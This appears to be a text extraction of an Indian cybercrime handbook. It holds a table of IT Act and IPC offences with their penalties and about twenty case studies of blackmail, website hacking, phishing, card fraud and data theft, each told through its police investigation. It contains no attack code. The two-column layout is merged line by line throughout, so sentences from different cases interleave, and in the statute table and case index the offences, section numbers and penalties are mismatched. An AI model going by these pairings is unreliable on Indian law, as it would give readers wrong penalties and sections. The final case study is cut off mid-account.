16. Penalty for misrepresenta- Sec.71 imprisonment for a term one year, or with fine, or
tion which may extend to two with both.
years, or with fine which 31. Bogus websites , Cyber Sec .420 7 years with fine or without
may extend to one lakhs ru- Frauds IPC fine.
pees, or with both. 32. E-mail Spoofing Sec .463 Imprisonment and/or fine
17. Breach of confidentiality Sec.72 Imprisonment for a term IPC
and privacy which may extend to two 33. Making a false document Sec.464 Imprisonment and/or fine
years, or with fine which IPC
may extend to one lakhs ru- 34. Forgery for purpose of Sec.468 Imprisonment of either de-
pees, or with both. cheating IPC scription for a term which
18. Publishing False digital sig- Sec.73 Imprisonment for a term may extend to seven years,
nature certificates which may extend to two and shall also be liable to
years, or with fine which fine.
may extend to one lakhs ru- 35. Forgery for purpose of Sec.469 Imprisonment of either de-
pees, or with both. harming reputation IPC scription for a term which
19. Publication for fraudulent Sec.74 Imprisonment up to two may extend to three years,
purpose years, or with fine up to one and shall also be liable to
lakhs rupees, or with both. fine.
29. Act to apply for offence or Sec.75 NA 36. Web-Jacking Sec .383 Imprisonment of either de-
contraventions committed IPC scription for a term which
outside India may extend to three years,
21. Compensation, penalties Sec.77 NA or with fine or with both
or confiscation not to 37. E-mail Abuse Sec .500 Imprisonment for term
interfere with other pun- IPC which may extend to 2yrs/
ishment fine or both
22. Compounding of Offences Sec.77A NA 38. Punishment for criminal Sec.506 Imprisonment of either de-
23. Offences with three years Sec.77B NA intimidation IPC scription for a term which
imprisonment to be cog- may extend to 7yrs/fine, or
nizable with both.
24. Exemption from liability Sec.79 NA 39. Criminal intimidation by an Sec.507 Imprisonment of either
of intermediary in certain anonymous communication IPC description for a term which
cases
may extend to two years.

40. When copyright infringed:- Sec.51 Imprisonment may not be 46. Sale, etc., of obscene ob- Sec .293 On first conviction with im-
Copyright in a work shall less than six months but jects to young person IPC prisonment of either descrip-
be deemed to be infringed. which may extend to three tion for a term which may
years. extend to three years, and
41. Offence of infringement of Sec.63 Imprisonment for a term with fine which may extend
copyright or other rights which shall not be less than to two thousand rupees,
conferred by this Act. Any 6 months but which may and, in the event of a second
person who knowingly extend to 3yrs and with fine or subsequent conviction,
infringes or abets the in- which shall not be less than with imprisonment of either
fringement. description for a term which
50,000 but which may ex-
tend to 2 lakhs rupees. may extend to seven years,
42. Enhanced penalty on sec- Sec.63A Imprisonment for a term and also with fine which
ond and subsequent convic- which shall not be less than may extend to five thousand
tions one year but which may rupees.
extend to three years and 47. Obscene acts and songs Sec.294 Imprisonment of either de-
with fine which shall not be IPC scription for a term which
less than one lakhs rupees may extend to three months,
but which may extend to two or with fine, or with both.
lakhs rupees. 48. Theft of Computer Hard- Sec. 378 Imprisonment of either de-
43. Knowing use of infringing Sec.63B Imprisonment for a term ware scription which may extend
copy of computer program which shall not be less than to 3 years, with fine, or both.
to be an offence seven days but which may 49. Punishment for theft Sec.379 Imprisonment of either de-
extend to three years and scription for a term which
with fine which shall not be may extend to 3yrs/fine, or
less than fifty thousand ru- with both.
pees but which may extend 50. Online Sale of Drugs NDPS Imprisonment for a term
to two lakhs rupees. Act which shall not be less than
44. Obscenity Sec. 292 on first conviction with im- 10 years but which may
IPC prisonment of either descrip- extend to 20 years and shall
tion for a term which may also be liable to fine which
extend to two years, and shall not be less than1
with fine which may extend lakhs but which may extend
to two thousand rupees, and to2 lakhs.
in the event of a second or 51. Online Sale of Arms Arms Imprisonment for a term
subsequent conviction, with Act which shall not be less than
imprisonment of either de- five years but which may
scription for a term which extend to ten years and shall
may extend to five years, also be liable to fine.
and also with fine which
may extend to five thousand
rupees.
45. Printing etc. of grossly in- Sec. Imprisonment of either de-
decent or scurrilous mat- 292A scription for a term which
ter or matter intended for IPC may extend to two years, or
blackmail. with fine, or with both.

Cyber Crime Case Studies of India: Illegal Money Transfer Pune 3yrs of imprisonment
and/or up to 2 lakhs
13
fine.
Intellectual Property Bangalore 3yrs of imprisonment
CASE STUDY INDEX Theft and/or up to 5 lakhs
14
fine.
SL Title City Punishment
Morphed Photographs New Delhi 5yrs of imprisonment
No. and/or up to 1 lakhs
15
1 Blackmailing Mumbai 2yrs of imprisonment fine.
and/or up to 2 lakhs Credit Card Fraud Mumbai 3yrs of imprisonment
fine. and/or up to 5 lakhs
16
CM Website Hacking Bangalore 3yrs of imprisonment fine.
and/or up to 5 lakhs Obscene Emails Mumbai 3yrs of imprisonment
2
17
Create Fake Profile Hyderabad 3yrs of imprisonment fine.
and/or up to 5 lakhs Obscene Phone Calls Bangalore 3yrs of imprisonment
3
18
Credit Card Fraud Chennai 3yrs of imprisonment fine.
and/or up to 5 lakhs Online Railway Ticket New Delhi 7 years with fine or
4
fine. Fraud without fine.
19
Cyber Extortion Mumbai 2yrs of imprisonment
and/or up to 2 lakhs Online Stock Exchange New Delhi 7 years with fine or
5 Fraud without fine.
fine. 20
Cyber Stalking South Delhi 2yrs of imprisonment

and/or up to 2 lakhs RBI Website Hacking Mumbai Imprisonment of either
6 description for a term
fine. 21
which may extend to
Data theft New Delhi 3yrs of imprisonment
three years, or with
7 fine or with both.
fine.
Sexual Harassment Kolkata On first conviction
Fake Travel Agent Mumbai 3yrs of imprisonment
5yrs jail and/or fine
and/or up to 5 lakhs 22
8 up to one lakhs. On
fine.
second conviction
Hacking Bangalore 3yrs of imprisonment 10yrs jail and/or two
and/or up to 5 lakhs lakhs fine.
9
fine.
Online Fraud Work at Mumbai 7 years with fine or
Hosting Obscene Profile Chennai 3yrs of imprisonment home without fine.
and/or up to 5 lakhs 23
10
fine. ATM Card Fraud Chennai 7 years with fine or
ICICI Website Hacking Kolkata 3yrs of imprisonment without fine.
24
11
fine.
ICICI Phishing Chennai 3yrs of imprisonment
12
fine.

1. BlackmailinG In the raid one computer, two laptops, seven mobile phones and a scanner
were seized. The computer equipment that was recovered was sent to the of-
fice of the forensic examiner, who found all the evidences of e-mails, chatting
Case: Blackmailing details etc. in the laptops and the computer.
State: Maharashtra
During the investigation, property worth INR 0.9 million was seized, along
City: Mumbai with cash worth INR 0.3 million. The total flow of the extorted money was
Sections of Law: 292, 389,420,465,467,468,471, 474 IPC r/w 67 of IT Act traced from the bank in Dubai to the account of the accused person.
2000
Background: Source: - http://indiacyberlab.in/know_more/legal-hacking.htm

The accused posed to be a young girl living in Kolkata and lured a non-resi-
dent Indian (NRI) working in Dubai (the complainant) to enter into an e-mail
correspondence. Subsequently, the accused began corresponding with the
complainant using different e-mail Ids, under the guise of different female 2. CM WeBSITE HACKED
names which made the complainant believe that he was corresponding with
different girls. Case: Website hacking
State: Karnataka
Having won the confidence of the complainant, the accused asked him for
money and gifts. The complainant complied with the requests in the hope City: Bangalore
of receiving sexual favors from the girls he was corresponding with. Howev- Sections of Law: 292, 389,420,465,467,468,471, 474 IPC r/w 67 of IT Act
er, after a period of timewhen these favors were not forthcoming, the com- 2000
plainant stopped the correspondence. Background:
The accused then restored to blackmailing the complainant by referring to Karnataka Chief Minister Jagadish Shettars personal website had been
the e-mail exchanges that had taken place earlier. In addition, the accused hacked by some persons, claiming themselves to be from Pakistan.
led the complainant to believe that one of the girls had committed suicide
and that the complainant was responsible for it. The accused also sent fake The site was found hacked on September 14 by a group of persons who posted
copies of the letters from CBI, High Court of Calcutta, New York Police and some message about OP Free Kashmir and a complaint was lodged by the
Punjab University etc. firm handling the portal.
The complainant lived in constant fear of being arrested in connection with Investigation:
the suicide over a year and a half. He paid the accused a sum of INR 12.5
million ostensibly to bribe the officials that were supposedly investigating the Initial investigations have shown that the IP address was a proxy. Often crim-
suicide and to compensate the victims family for the loss of her income. The inals who dont want to be tracked down protect their original IP address by
complainant was continuously under the threat of being arrested by the po- giving out a proxy IP. Criminals create very realistic sites that aim at collect-
lice. Given the huge strain upon his financial resources as well as the mental ing personal information and this is what the Black Hat Hackers- Sky walkers
agony faced by him, the complainant himself contemplated suicide. have done, said Shubha Sunil, founder chairperson of the CSRT. She said
the same group hacked various government and private websites earlier.
They have been working in groups. Some members of this group were also
Investigation:
involved in the hacking of Bruhat Bengaluru Mahanagara Palike, BJP and
The complainant handed over all the e-mail correspondence to the police. Congress websites in the past, though Anonymous was the main group be-
Many of them had masked headers and therefore the police could not inves- hind the cyber-attacks, she added.
tigate them any further. Moreover there was no e-mail that could be traced
to Kolkata where the accused was staying as per the complainants version. Over 289 government websites have been hacked by cyber criminals between
However the investigating teamwas able to trace some of these e-mails to the January and August this year as per our survey. A malware can be installed
corporate office of a large cement company and a residence in Mumbai. A raid in users system just during a visit to a compromised website, and it will then
was conducted at these premises. compromise the computer and the privacy of the content available on the
site, she said.

Shubha Sunil further said, Even though the website is restored in five min- computer and the handy-cam were sent to the forensic security laboratory for
utes after it is compromised, the malware could still affect any user who open further analysis.
the website during the attack.
The experts of the forensic security laboratory analyzed the material and is-
M Praveen Kumar, Managing Director, Squadm Technologies (the company sued a report stating that: The hard disk of the seized computer contained
that manages the chief ministers website), said: The website, www.jagadish- text that was identical to that on the obscene e-mail; the computer had been
settar.com, was launched on September 29, 2010, and the hacker placed used to access the matrimonial websites on which the obscene profiles were
words in Urdu, and the name (of the group) and purpose in English. posted;
The content placed on the website read: I am ready to give my blood to my The computer had been used to access the e-mail account that was used to
nation. I am a Pakistani, I want peace and freedom. There were also other send the obscene e-mail; the handy-cam seized from the accused contained
messages in Urdu. images identical to the ones post on the matrimonial Websites.
Based on the report of the FSL it was clearly established that the ac-
3. Creating fake profile cused had: Created a fictitious e-mail ID and had sent the obscene e-mail to
the complainant; posted the profiles of the victim along with her photographs
Case: Creating fake profile on the matrimonial sites.
State: Andhra Pradesh
City: Hyderabad Source: - http://indiacyberlab.in/know_more/legal-hacking.htm
Sections of Law 67 Information Technology Act 2000, 507, 509 of the Indi-
an Penal Code.
Background:
4. CREDIT CARD FRAUD
The complainant received an obscene e-mail from an unknown e-mail ID. The
complainant also noticed that obscene profiles along with photographs of his
daughter had been uploaded on matrimonial sites. Case: Credit Card Fraud
Investigation: State: Tamil Nadu
The investigating officer examined and provided the statements of the com-
plainant and his daughter. The complainant stated that his daughter was City: Chennai
divorced and her husband had developed a grudge against them due to the
failure of the marriage. Sections of Law: Section of Law 66 of Information Technology Act 2000 &
120(B), 420, 467, 468, 471 IPC.
The investigating officer took the original e-mail from the complainant and
extracted the IP address of the same. From the IP address he could ascertain
the Internet service provider. Background:
The IP address was traced to a cable Internet service provider in the city area The assistant manager (the complainant) with the fraud control unit of a large
of Hyderabad. The said IP address was allotted to the former husband some- business process outsourcing (BPO) organization filed a complaint alleging
time back and his house was traced with the help of the staff of ISP. that two of its employees had conspired with a card holder to manipulate the
credit limit and as a result cheated the company of INR 0.72 million.
A search warrant was obtained and the house of the accused was searched.
During the search operation, a desktop computer and a handy-cam were The BPO facility had about 350 employees. Their primary function was to
seized from the premises. A forensic IT specialist assisted the investigation issue the banks credit cards as well as attend to customer and merchant
officer in recovering e-mails (which were sent to the complainant), using a queries. Each employee was assigned to a specific task and was only allowed
specialized disk search tool as well as photographs (which had been posted on to access the computer system for that specific task. The employees were not
the Internet) from the computer and the handy-cam respectively. The seized allowed to make any changes in the credit-card holders account unless they

received specific approvals. 5. CYBER EXTORTION
Each of the employees was given a unique individual password. In case they
Case: Cyber Extortion
entered an incorrect password three consecutive times, then their password
would get blocked and they would be issued a temporary password.
State: Maharashtra
The company suspected that its employees conspired with the son (holding an
add-on card) of one of the credit card holders. The modus operandi suspected
by the client is as follows. City: Mumbai
The BPO employee deliberately keyed in the wrong password three consecu-
tive times (so that his password would get blocked) and obtained a temporary Sections of Law: 420,465,467,471,474 of the IPC r/w 67 of IT Act 2000
password to access the computer system. He manually reversed the transac-
tions of the card so that it appeared that payment for the transaction has tak-
Sources: http://www.indiaforensic.com/cyberextortion.htm
en place. The suspect also changed the credit card holders address so that
the statement of account would never be delivered to the primary card holder.
Background:
Investigation: 51-year-old cybercriminal Pranab Mitra, a former executive of Gujarat Ambu-
ja Cement, was arrested for posing as a woman and seducing online an Abu
The investigation team visited the premises of the BPO and conducted de- Dhabi-based man.
tailed examination of various persons to understand the computer system
used. They learnt that in certain situations the system allowed the user to Mitra posed as a woman, Rita Basu and created a fake e-mail ID through
increase the financial limits placed on a credit card. The system also allowed which he contacted one V.R. Ninawe. According to the FIR, Mitra trapped
the user to change the customers address, blocking and unblocking of the Ninawe in a cyber-relationship sending emotional messages and indulging
address, authorizations for cash transactions etc. in online sex since June 2002. Later, Mitra sent an e-mail that she would
commit suicide if Ninawe ended the relationship.
The team analyzed the attendance register which showed that the accused
was present at all the times when the fraudulent entries had been entered in He also gave him another friend Ruchira Senguptas e-mail ID which was
the system. They also analyzed the system logs that showed the accusers ID in fact his second bogus address. When Ninawe mailed at the other ID he
had been used to make the changes in the system. was shocked to learn that Mitra had died. Then Mitra began the emotional
blackmail by calling up Abu Dhabi to say that police here were searching for
The team also visited the merchant establishments from where some of the Ninawe.
transactions had taken place. The owners of these establishments identified
Ninawe panicked on hearing the news and asked Mitra to arrange for a good
the holder of the add-on card.
advocate for his defence. Ninawe even deposited a few lakhs in the bank as
advocate fees. Mitra even sent e-mails as high court and police officials to ex-
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm tort more money. Ninawe finally came down to Mumbai to lodge a police case.
Investigation:
Mitra does not know much about computer hacking, yet 51-year-old cy-
ber-criminal Pranab Mitra has stunned even the cybercrime investigation cell
of Mumbai police with his bizarre fraud on the Net. Mitra was arrested on
Monday for posing as a woman and seducing online an Abu Dhabi-based
man, thereby managing to extort 96 lakhs from him.
Investigating officer, Assistant Commissioner of Police, J.S. Sodi, said Mitra

has been remanded to police custody till June 24, and has been booked for

cheating, impersonation, blackmail and extortion under sections 420, 465, The police feel the accused might be known to the victim as he seemed to
467, 471, 474 of the IPC, read with the newly formed Information Technology know a lot about her. The cyber stalker can be booked under Section 509 of
Act. the IPC for outraging the modesty of a woman and also under the Information
Technology Act, 2000.
6. CYBERSTALKING
Delhi Police set up two computer training centers this year to enable its staff
Case: Cyber Stalking to investigate cybercrime.
State: Delhi Source: Times of India 26.12.2003
7. DATA THEFT
City: South Delhi
Case: Data theft
Sections of Law: Section 509 of the IPC for outraging the modesty of a woman
and also under the Information Technology Act, 2000. State: Delhi
Background: City: New Delhi
Little did Sangita Khanna (name changed), an employee with an embassy in

New Delhi, know that web surfing would lead to an invasion of her privacy. Sections of Law 420/408/120B IPC R/W 66 IT Act
In an apparent case of cyber stalking, Sangita (32) received a series of e-mails

from a man asking her to either pose in the nude for him or pay 1 lakhs to Background:
him. In her complaint to Delhi Police, the woman said she started receiving
these mails in the third week of November. The complainant filed a case of fraud and cheating alleging theft and sale of
proprietary data. The complainant had a subsidiary company in the Unit-
The accused threatened Sangita that he would put her morphed pictures on ed States which did business with its US partner. The US partner provided
display at sex websites, along with her telephone number and address. He mortgage loans to US residents for residential premises. The business of the
also allegedly threatened to put up these pictures in her neighbor-hood in complainant was providing leads to their US partner. The data included the
southwest Delhi. details of the loan seekers along with their telephone numbers. The com-
plainant generated leads through arrangements with call centers in India who
Initially, she ignored the mails, but soon she started receiving letters through called from their database and short listed home owners who were interested
post, repeating the same threat. She was forced to report the matter to the in availing refinance facility on their existing mortgage loans.
police, said an officer with cybercrime cell.
The complainant realized that there was a sudden drop in the productivity
That, however, was not the end of her ordeal. The accused mailed the wom- of the call centers and therefore the production of leads, although the inputs
an her photographs. The woman claimed these were the same photographs meant to be given to various call centers by the employees of the company
which she had kept in her mail folder. had remained the same as before. The concerned officials of the company got
alarmed and made an in house enquiry. On a careful and meticulous scruti-
ny it was revealed that one of the employees of the complainant (company), in
Investigation: connivance with some other officers, had been deceiving and causing wrong-
ful loss to the company by selling the data purchased by the company and in
The police said the accused had hacked her e-mail password which enabled
effect wrongful gain for themselves.
him to access the pictures. A preliminary inquiry into the complaint has re-
vealed that the mails were sent to the victim from a cyber cafe in south Del-
hi. We hope to trace the accused soon, said deputy commissioner of police
(crime) Dependra Pathak.

Investigation: 8. FAKE TRAVEL AGENT
Preliminary investigations revealed that the accused was holding the post of
Case: Fake travel agent
the senior program manager and was the team leader for data management.
During employment the accused along with his father had opened a partner-
ship firm. It was found that raw data was sent as attachments from the e-mail State: Maharashtra
ID of this (accused) firms Website domain. The Website was traced and the
e-mail ID address and registration details were recovered by the investigat-
ing officer using specialized softwares. It was revealed that the accused had City: Mumbai
passed data bought by and belonging to the complainant firm to various call
centers (as if the same belonged to his firm), to make the calls on their behalf
Sections of Law 420, 465, 467, 468, 471, and 34 of IPC r/w 143 of Indian
for generating leads.
Railway Act 1989.
The entire business process of the complainant firm was studied and a sys-
tems analysis was conducted to establish the possible source of data theft. Background:
The accused had opened a foreign currency account in the name of his firm.
An analysis of the printout revealed that payments had been made to two call The accused in this case was posing to be a genuine railway ticket agent and
centers. The call centers were contacted and the raw data sent as attach- has been purchasing tickets online by using stolen credit cards of nonresi-
ments were corrected. dents. The accused created fraudulent electronic records/profiles, which he
used to carry out the transactions. The tickets so purchased were sold for
The data was comprised of six separate files and it was compared with the cash to other passengers. Such events occurred for a period of about four
data purchased by the complainant company in the US. This was done by months.
writing and executing SQL queries. Analysis of the e-mail headers of the mails
sent by the accused through his ID were carried out. The originating IP ad- The online ticket booking service provider took notice of this and lodged a
dress was found and information was obtained from VSNL. Accordingly it complaint with the cybercrime investigation cell.
was found that the range of IP was allotted to the complainant company. It
was thus established that the accused has sent the stolen data from the office
of the complainant company using the e-mail ID of his (accused) firm. Investigation:
An analysis of the bank account of the accused showed that payments were The service provider gave the IP addresses, which were used for the fraudu-
being made to two people. It was found that they were also ex-employees of lent online bookings, to the investigating team. IP addresses were traced to
the complainant company who had resigned after the accused left the compa- cyber cafes in two locations.
ny. On interrogation he revealed that he had roped in two of his colleagues
who actively assisted him in his clandestine activities. One of them, while still The investigating team visited the cyber cafes but was not able to get the de-
an employee of the complainant company, coordinated with various call cen- sired logs as they were not maintained by the cyber caf owners. The inves-
ters on behalf of the accused. The other facilitated the installation of propri- tigating team was able to short list the persons present at cyber cafes when
etary sequencing software in the personal computer of the accused. In order the bookings were made. The respective owners of the cyber cafes were able
to have a clientele base in US, the accused had sought the assistance of one to identify two persons who would regularly book railway tickets.
more person. The two accused were arrested.
The investigating team then examined the passengers who had traveled on
these tickets. They stated that they had received the tickets from the accused
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm and identified the delivery boy who delivered the tickets to them. On the basis
of this evidence the investigating team arrested two persons who were identi-
fied in an identification parade.
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm

9. Hacking 10. HOSTING OBSCENE PROFILES
Case: Hacking Case: Hosting obscene profiles
State: Karnataka State: Tamil Nadu
City: Bangalore City: Chennai
Sections of Law 66 & 67 of IT Act 2000 Sections of Law: 67 of Information Technology Act 2000, 469, 509 of the IPC.
Background: Background:
The complainant approached the police stating that she had been receiving
obscene and pornographic material at her e-mail address and mobile phone. The complainant stated that some unknown person had created an e-mail
She stated that this person appeared to know a lot about her and her family ID using her name and had used this ID to post messages on five Web pages
and believed that her e-mail account had been hacked. describing her as a call-girl along with her contact numbers.
As a result, she started receiving a lot of offending calls from men.

Investigation:
Investigation:
The investigating team using a different e-mail ID tried to chat with the ac-
cused using the complainants e-mail ID Subsequently the investigating team After the complainant heard about the Web pages with her contact details,
was able to identify the ISP address of the computer system being used and it she created a username to access and view these pages.
was tracked to an organization in Delhi.
Using the same log-in details, the investigating team accessed the Web pages
The investigating team visited the company and through its server logs was where these profiles were uploaded. The message had been posted on five
able to identify the system from which the obscene material was sent. Using groups, one of which was a public group.
forensic disk imaging and analysis tools the e-mails were retrieved from the
system. The residence of the accused was located and the hard disk of his The investigating team obtained the access logs of the public group and the
personal computer was seized. On the basis of the evidence gathered the ac- message to identify the IP addresses used to post the message. Two IP ad-
cused was arrested. dresses were identified.
The ISP was identified with the help of publicly available internet sites. A
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm request was made to the ISPs to provide the details of the computer with the
IP addresses at the time the messages were posted. They provided the names
and addresses of two cyber cafes located in Mumbai to the police.
The investigating team scrutinized the registers maintained by the cyber cafes
and found that in one case the complainants name had been signed into the
register.
The team also cross-examined the complainant in great detail. During one
of the meetings she revealed that she had refused a former college mate who
had proposed marriage.

In view of the above the former college mate became the prime suspect. Us- planning to offer him a commission, Patel said, investing officers.
ing this information the investigating team, with the help of Mumbai police,
arrested the suspect and seized a mobile phone from him. After the forensic
examination of the SIM card and the phone, it was observed that phone had Investigation:
the complainants telephone number that was posted on the internet. The
The bank officials have confirmed that there was an attempt to hack their
owner of the cyber cafes also identified the suspect as the one who had visited
website and server, City Crime Branch Cyber Cell head K L Patel said
the cyber cafes.
Police have nabbed a youth and recovered from him certain documents of ICI-
Based on the facts available with the police and the sustained interrogation
CI Bank also a laptop, pen drives, disks and a communication set.
the suspect confessed to the crime.
Large number of documents pertaining to the bank and its account hold-
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm ers were recovered from his possession, pointing to his attempt to hack the
banks website, Patel said.
Source: Published: Saturday, July 7, 2012, 18:58 [IST] by PTI
11. ICICI Website Hacking
Case: Engineering dropout attempting to hack ICICI website held 12. ICICI PHISHING
State: West-Bengal Case: ICICI Bank told to pay 13 lakhs to NRI customer
City: Kolkata State: Tamil-Nadu
Sections of Law: Section 65 and 66 of Information Technology (IT) Act, Be- City: CHENNAI
sides IPC 420.
Background:
Background:
Uma Shankar (victim) stated that he received an email purportedly from ICI-
The youth was identified as Manish Pandey from Kolkata, son of a doctor and CI Bank in September 2007, asking him to reply with his internet banking
a fourth semester dropout of an Engineering college. Manish was arrested on username and password, failing which his account would be deleted.
7 July 2012 for attempting to hack the website of ICICI Bank.
Unaware that the email was bogus, Uma Shankar replied with his details and
He intended to set up a clone server to facilitate transfer of funds from the soon after Rs6.46 lakhs was transferred from his account to another ICICI
bank and was allegedly being helped by a few IITians. Bank account, which withdrew 4.6 lakhs from an ICICI branch in Mumbai
and retained the balance in its account.
The youth had conducted a detailed vulnerability test of the banks website,
checked traffic flow details, traced the banks server at Bandra-Kurla Com- In his application for adjudication filed under the IT Act to the state IT secre-
plex (in Mumbai) and was attempting to set up a clone server to facilitate fund tary on June 26, 2008, he held the bank responsible for the loss.
transfer.
Uma Shankar immediately informed ICICI Bank about the fraud. However, he
His target was to make fund transfer of 10 crore from the bank so that he alleged that the bank didnt take any action and denied having any informa-
could have set up an IIT-JEE coaching institute in Varanasi. tion about the scammers account. So Uma Shankar sued ICICI Bank under
the Information Technology Act.
Pandey had come to Ahmedabad in search of a destination account holder,
through whose account he could have effected fund transfers and he was

Investigation: 13. ILLEGAL MONEY TRANSFER
Techno-legal consultant N Vijaya Shankar, who represented Uma Shankar in

Case: Illegal money transfer
court, says, Banks should not add to the problem. They must send emails
and letters with digital signatures, but they dont.
State: Maharashtra
This was a point of contention in this case. A digital signature is an impres-
sion of a signature of an authorized signatory for electronic communication.
City: PUNE
Court Verdict:
Sections of Law 467, 468, 471, 379, 419, 420, 34 of IPC & 66 of IT Act.
Tamil Nadu IT secretary on Monday directed ICICI Bank to pay 12.85 lakhs
to an Abu Dhabi-based NRI within 60 days for the loss suffered by customer
due to a phishing fraud. The compensation includes the loss suffered by the
petitioner, the travel expenses and the financial loss incurred on account of Background:
complete lack of involvement of the respondent bank,
The accused in the case were working in a BPO that was handling the busi-
Next Action: ICICI Bank, however, maintains that the blame lies with the ness of a multinational bank. The accused, during the course of their work
customer and says it will be taking the case to a higher court. An ICICI spokes- had obtained the personal identification numbers (PIN) and other confiden-
man said, ICICI Bank will appeal. We reassure customers that our security tial information of the banks customers. Using these the accused and their
systems are continuously audited and neither our security nor our processes accomplices, through different cyber cafes, transferred huge sums of money
have been breached. from the accounts of different customers to fake accounts.
Conclusion: In 2001, the Reserve Bank of India ruled that banks must have Investigation:
a digital signature on all their electronic communication. Despite this, most
banks (and companies) do not use digital signatures On receiving the complaint, the entire business process of the complainant
firm was studied and a systems analysis was conducted to establish the pos-
sible source of the data theft.
Sources: http://whichrightchoice.com/icici-bank-to-pay-customer
The investigators were successful in arresting two people as they laid a trap
in a local bank where the accused had fake accounts for illegally transferring
http://articles.economictimes.indiatimes.com/ money.
During the investigation the system server logs of the BPO were collected. The
IP addresses were traced to the internet service provider and ultimately to the
cyber cafes through which illegal transfers were made.
The registers maintained in the cyber cafes and the owners of cyber cafes as-
sisted in identifying the other accused in the case. The e-mail Ids and phone
call printouts were also procured and studied to establish the identity of the
accused. The e-mail accounts of the arrested accused were scanned which
revealed vital information to identify the other accused. Some e-mail ac-
counts of the accused contained swift codes, which were required for internet
money transfer.
All the 17 accused in the case were arrested in a short span of time. The
charge sheet was submitted in the court within the stipulated time. In the

entire wire transfer scam, an amount to the tune of about INR 19 million 15. MORPHED PHOTOGRAPHS
was transferred, out of this INR 9 million was blocked in transit due to time-
ly informed by police, INR 2 million was held in balance in one of the bank Case: Morphed photographs
accounts opened by the accused which was frozen. In addition, the police
recovered cash, ornaments, vehicles and other articles amounting to INR 3
million. State: Delhi
During the investigation, the investigating officer learned the process of wire
transfer, the banking procedures and weakness in the system. The investi- City: New Delhi
gating officer suggested measures to rectify the weakness in the present se-
curity systems of the call center. This has helped the local BPO industry in
Sections of Law 67 of IT Act, 120-B, 506, 509 IPC
taking appropriate security measures.
Background:
The complainant was receiving threatening and obscene e-mails from un-
14. INTELLECTUAL PROPERTY THEFT
known people. The e-mails contained the complainants obscene morphed
photographs. The accused threatened to post these on pornographic Web-
Case: Intellectual property theft sites and alleged that one such photograph was posted on a popular Website.
State: Karnataka
Investigation:
City: Bangalore The IP address used for posting the obscene photograph(s) on the Website and
the mails sent to the complainant were retrieved and traced to a company in
Delhi.
Sections of Law 65 and 66 of the IT Act 2000, 381, 420 of the Indian Penal
Code. A search of the computer terminals located in the companys premises was
conducted. The log records and cookies were examined. During the process,
Background: the morphed photograph of the complainant was found in one of the termi-
nals used by the accused. The e-mail accounts mentioned were also accessed
The complainant (Software Company based in Bangalore) alleged that some of after disclosure by the accused. The central processing unit of the computer
the companys former employees had accessed the companys IT system and was seized and sent for a forensic analysis to the central forensic science lab-
tampered with the source code of the software under development. oratory. Using disk imaging and analysis tools, the mirror image of the hard
disk was taken and analyzed which led to the recovery of all the incriminating
data/files required for the case
Investigation:
During the investigation it was learnt that the accused was an ex-colleague of
The investigating team visited the complainants premises and scanned the the complainant.
logs of e-mails. They identified the IP address and using tracing software
traced the ISP and the address of the place where the e-mails had been sent.
This address was of a Hyderabad based company. On visiting the company,
the investigating team found 13 computers and a server. Using specialized
forensic tools, the disks were imaged and analyzed by the team. The analy-
sis revealed that the original source code as well as its tampered version had
been stored from these systems.

16. Credit Card Frauds 17. OBSCENE E-MAILS
Case: Credit card fraud Case: Obscene e-mails
State: Maharashtra State: Maharashtra
City: Mumbai City: Mumbai
Section of law 420 of I.P.C (Cheating) Sections of Law 67 of IT Act 2000 r/w sec 2 of Indecent Representation of
Women (Prohibition) Act 1986.
Date: August 21, 2003

Background:
Background: The complainant received an e-mail stating that the sender had in his posi-
tion some objectionable/morphed/obscene photographs of the complainant.
Amit Tiwari had many names, bank accounts and clients. None of them were The accused in this case demanded to meet the complainant. Failing to do
for real. With a plan that was both ingenious and nave, the 21-year-old en- so, the accused threatened to put these on the Internet and circulate these
gineering student from Pune tried to defraud a Mumbai-based credit card among her friends and relatives.
processing company, CC Avenue, of nearly 900,000. He was arrested by the
Mumbai Police on August 21, 2003 after nearly an year of hide and seek with
CC Avenue. Hes been charged for cheating under Section 420. Investigation:
On receiving the complaint, the investigating team extracted the e-mail head-
Investigation: er to trace the IP address. This IP address was tracked down as a company.
CC Avenue verifies and validates credit cards of buyers for over a thousand Using system logs, the exact computer used and its user were identified. The
e-commerce Web sites. It conducts checks like IP mapping, zip code mapping accused was arrested. The investigating team also seized the computer and
and reverse lookup of telephone numbers. Amit Tiwari found a way to bypass some photographs of a look-alike of the victim from the accused. These ev-
them. In May 2002, Col Vikram Tiwari signed up for CC Avenues services. In idences were sent to the forensic sciences laboratory, which confirmed that
November, he requested the company to deal with his son, Amit, who offered the seized computer contained evidence that implicated the accused in the
Web designing services on www.mafiaz.com. CC Avenues security team con- incident.
firmed his credentials through bank signature verification, driving license and
his HDFC Bank debit card. Everything was genuine. Amit processed several
transactions, worth 311,508, via CC Avenue from November 2002 to Feb-
ruary 2003. Then the transactions stopped. In April 2003, CC Avenue began Source: - http://indiacyberlab.in/know_more/legal-hacking.htm
receiving charge-backs from the credit card holders, who denied using mafiaz.
coms Web designing service. Amit had assumed the identities of these cus-
tomers, and purchased www.mafiaz.coms services with credit card details
that he found on the Net. He was both the buyer and the seller. Calls to Am-
its house in Lucknow went unanswered. Legal notices came back unclaimed.
Amit had disappeared without a trace.
Source: www.Indiatimes.com

18. OBSCENE PHONE CALLS it was found that the other SIM card was allotted to a college student and was
being used by his friend. The investigating officer got suspicious and on fur-
Case: Obscene phone calls ther enquiry found that the college student was of dubious character.
The investigating officer obtained a search warrant and raided the residence
State: Karnataka of the college student. Using disk imaging and analysis tools, the team recov-
ered the obscene profile that was posted on the Internet from the students
computer. The partners of the accused were also examined in the presence of
City: Bangalore City the complainant. The accused admitted that he was guilty.
It later transpired that the college student was a close family friend of the
Sections of Law 67 of IT Act 2000 complainant and that he was suffering from a personality disorder, secondary
depression and poor self-esteem.
Background:
A written complaint was submitted by the complainant stating that she had
been receiving obscene phone calls on her mobile and landline numbers. The
complainant learnt from the callers that a doctored profile of hers had been
posted on a Website. The profile stated that the complainant loved sex and 19. ONLINE RAILWAY TICKET FRAUD
when the viewers were in Bangalore, they should contact her. The profile also
gave out victims landline and mobile phone numbers.
Case: Online railway ticket fraud
Investigation:
State: Delhi
The investigating officer (IO) attempted to trace the culprit by using a differ-
ent e-mail ID on a chat site, when the perpetrator of the crime was online. City: New Delhi
